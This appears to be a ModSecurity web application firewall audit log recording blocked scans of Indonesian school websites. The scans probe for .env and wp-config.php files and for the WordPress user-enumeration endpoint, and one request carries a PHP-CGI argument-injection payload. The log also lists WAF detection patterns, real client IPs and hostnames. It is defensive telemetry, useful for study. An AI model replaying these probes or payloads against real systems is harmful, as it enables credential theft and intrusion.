HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 105.27.192.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 105.27.192.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2e8daa7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e8daa7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745536252731626 15613 (- - -) Stopwatch2: 1745536252731626 15613; combined=26052, p1=501, p2=905, p3=0, p4=0, p5=12338, sr=119, sw=0, l=0, gc=12308 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e8daa7b-Z-- --73421646-A-- [25/Apr/2025:06:31:23 +0700] aArJy_Ku9d5eAb6Kn9_k1wAAAMM 103.236.140.4 41264 103.236.140.4 8181 --73421646-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 206.81.24.74 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 206.81.24.74 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --73421646-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73421646-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745537483220327 772 (- - -) Stopwatch2: 1745537483220327 772; combined=333, p1=297, p2=0, p3=0, p4=0, p5=36, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73421646-Z-- --b084356f-A-- [25/Apr/2025:07:07:21 +0700] aArSOT8HMZgF-3Y3GtFG7gAAAFE 103.236.140.4 59374 103.236.140.4 8181 --b084356f-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 138.68.86.32 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 138.68.86.32 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --b084356f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b084356f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745539641489172 826 (- - -) Stopwatch2: 1745539641489172 826; combined=278, p1=240, p2=0, p3=0, p4=0, p5=38, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b084356f-Z-- --72a16f25-A-- [25/Apr/2025:09:00:00 +0700] aArsoOXF4ZX3hX-IbN62XAAAAI0 103.236.140.4 57230 103.236.140.4 8181 --72a16f25-B-- SSTP_DUPLEX_POST /sra_%7BBA195980-CD49-458b-9E23-C84EE0ADCD75%7D/ HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.124.180.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.124.180.157 X-Forwarded-Proto: https Connection: close Accept: */* --72a16f25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72a16f25-H-- Message: Access denied with code 403 (phase 2). Match of "rx ^(?i:(?:[a-z]{3,10}\\s+(?:\\w{3,7}?://[\\w\\-\\./]*(?::\\d+)?)?/[^?#]*(?:\\?[^#\\s]*)?(?:#[\\S]*)?|connect (?:\\d{1,3}\\.){3}\\d{1,3}\\.?(?::\\d+)?|options \\*)\\s+[\\w\\./]+|get /[^?#]*(?:\\?[^#\\s]*)?(?:#[\\S]*)?)$" against "REQUEST_LINE" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "114"] [id "217210"] [rev "1"] [msg "COMODO WAF: Invalid HTTP Request Line||103.236.140.4|F|4"] [data "SSTP_DUPLEX_POST /sra_%7BBA195980-CD49-458b-9E23-C84EE0ADCD75%7D/ HTTP/1.0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745546400739806 2291 (- - -) Stopwatch2: 1745546400739806 2291; combined=862, p1=469, p2=366, p3=0, p4=0, p5=27, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72a16f25-Z-- --a6dcbc01-A-- [25/Apr/2025:09:02:03 +0700] aArtG-OdEP6frSVs8CpGWwAAAAE 103.236.140.4 57808 103.236.140.4 8181 --a6dcbc01-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 86.106.74.249 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 86.106.74.249 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --a6dcbc01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6dcbc01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745546523244974 2881 (- - -) Stopwatch2: 1745546523244974 2881; combined=1324, p1=441, p2=854, p3=0, p4=0, p5=29, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6dcbc01-Z-- --f1e0bc2b-A-- [25/Apr/2025:09:23:04 +0700] aAryCOXF4ZX3hX-IbN63kQAAAIo 103.236.140.4 34470 103.236.140.4 8181 --f1e0bc2b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36 Accept-Charset: utf-8 --f1e0bc2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1e0bc2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745547784312545 762 (- - -) Stopwatch2: 1745547784312545 762; combined=304, p1=266, p2=0, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1e0bc2b-Z-- --3b96d16e-A-- [25/Apr/2025:10:23:40 +0700] aAsAPD8HMZgF-3Y3GtFltAAAAFY 103.236.140.4 50064 103.236.140.4 8181 --3b96d16e-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 161.35.149.209 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 161.35.149.209 Accept-Encoding: gzip X-Varnish: 137479380 --3b96d16e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3b96d16e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745551420186736 851 (- - -) Stopwatch2: 1745551420186736 851; combined=343, p1=306, p2=0, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b96d16e-Z-- --f7c6d279-A-- [25/Apr/2025:11:01:29 +0700] aAsJGT8HMZgF-3Y3GtFoEgAAAFI 103.236.140.4 59610 103.236.140.4 8181 --f7c6d279-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 64.23.236.146 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 64.23.236.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --f7c6d279-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7c6d279-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745553689481448 763 (- - -) Stopwatch2: 1745553689481448 763; combined=310, p1=269, p2=0, p3=0, p4=0, p5=40, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7c6d279-Z-- --14206e6c-A-- [25/Apr/2025:12:19:34 +0700] aAsbZvKu9d5eAb6Kn98XDgAAANg 103.236.140.4 50136 103.236.140.4 8181 --14206e6c-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 88.151.34.37 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 88.151.34.37 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --14206e6c-C-- --14206e6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14206e6c-E-- --14206e6c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745558374090590 5418 (- - -) Stopwatch2: 1745558374090590 5418; combined=3754, p1=462, p2=3255, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14206e6c-Z-- --7f314a0d-A-- [25/Apr/2025:15:27:29 +0700] aAtHcfKu9d5eAb6Kn98hSwAAANY 103.236.140.4 37164 103.236.140.4 8181 --7f314a0d-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 37.202.207.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.202.207.26 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --7f314a0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f314a0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745569649119583 815 (- - -) Stopwatch2: 1745569649119583 815; combined=322, p1=287, p2=0, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f314a0d-Z-- --6f4e003a-A-- [25/Apr/2025:15:43:22 +0700] aAtLKuOdEP6frSVs8Cpw6gAAABU 103.236.140.4 41062 103.236.140.4 8181 --6f4e003a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 104.248.209.195 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.248.209.195 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --6f4e003a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f4e003a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745570602196727 794 (- - -) Stopwatch2: 1745570602196727 794; combined=361, p1=309, p2=0, p3=0, p4=0, p5=52, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f4e003a-Z-- --de92681a-A-- [25/Apr/2025:16:06:46 +0700] aAtQpuXF4ZX3hX-IbN7cUwAAAIw 103.236.140.4 46626 103.236.140.4 8181 --de92681a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.148.10.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.148.10.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Accept-Charset: utf-8 --de92681a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de92681a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745572006401951 1094 (- - -) Stopwatch2: 1745572006401951 1094; combined=347, p1=308, p2=0, p3=0, p4=0, p5=39, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de92681a-Z-- --4a933d11-A-- [25/Apr/2025:17:41:06 +0700] aAtmwuXF4ZX3hX-IbN7hmwAAAIE 103.236.140.4 40404 103.236.140.4 8181 --4a933d11-B-- GET /wp-config.php.bkp HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 198.57.247.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 198.57.247.194 X-Forwarded-Proto: http Connection: close Accept: */* --4a933d11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a933d11-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745577666757616 770 (- - -) Stopwatch2: 1745577666757616 770; combined=316, p1=281, p2=0, p3=0, p4=0, p5=35, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a933d11-Z-- --1d19f665-A-- [25/Apr/2025:17:49:55 +0700] aAto0z8HMZgF-3Y3GtGAZQAAAE8 103.236.140.4 42512 103.236.140.4 8181 --1d19f665-B-- GET /app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362317 --1d19f665-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1d19f665-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578195359504 887 (- - -) Stopwatch2: 1745578195359504 887; combined=353, p1=313, p2=0, p3=0, p4=0, p5=40, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d19f665-Z-- --aeb59448-A-- [25/Apr/2025:17:49:55 +0700] aAto0z8HMZgF-3Y3GtGAZgAAAEg 103.236.140.4 42516 103.236.140.4 8181 --aeb59448-B-- GET /backend/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268852 --aeb59448-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --aeb59448-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578195557212 685 (- - -) Stopwatch2: 1745578195557212 685; combined=274, p1=241, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aeb59448-Z-- --81c1ee21-A-- [25/Apr/2025:17:49:55 +0700] aAto0z8HMZgF-3Y3GtGAZwAAAEY 103.236.140.4 42520 103.236.140.4 8181 --81c1ee21-B-- GET /api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362320 --81c1ee21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --81c1ee21-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578195755123 716 (- - -) Stopwatch2: 1745578195755123 716; combined=302, p1=269, p2=0, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81c1ee21-Z-- --106d0271-A-- [25/Apr/2025:17:49:55 +0700] aAto0z8HMZgF-3Y3GtGAaAAAAEk 103.236.140.4 42524 103.236.140.4 8181 --106d0271-B-- GET /code/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268855 --106d0271-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --106d0271-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578195953356 677 (- - -) Stopwatch2: 1745578195953356 677; combined=263, p1=230, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --106d0271-Z-- --3a3ab105-A-- [25/Apr/2025:17:49:56 +0700] aAto1D8HMZgF-3Y3GtGAaQAAAFY 103.236.140.4 42528 103.236.140.4 8181 --3a3ab105-B-- GET /db/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362323 --3a3ab105-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3a3ab105-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578196150944 701 (- - -) Stopwatch2: 1745578196150944 701; combined=257, p1=227, p2=0, p3=0, p4=0, p5=30, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a3ab105-Z-- --ad801e04-A-- [25/Apr/2025:17:49:56 +0700] aAto1D8HMZgF-3Y3GtGAagAAAEI 103.236.140.4 42536 103.236.140.4 8181 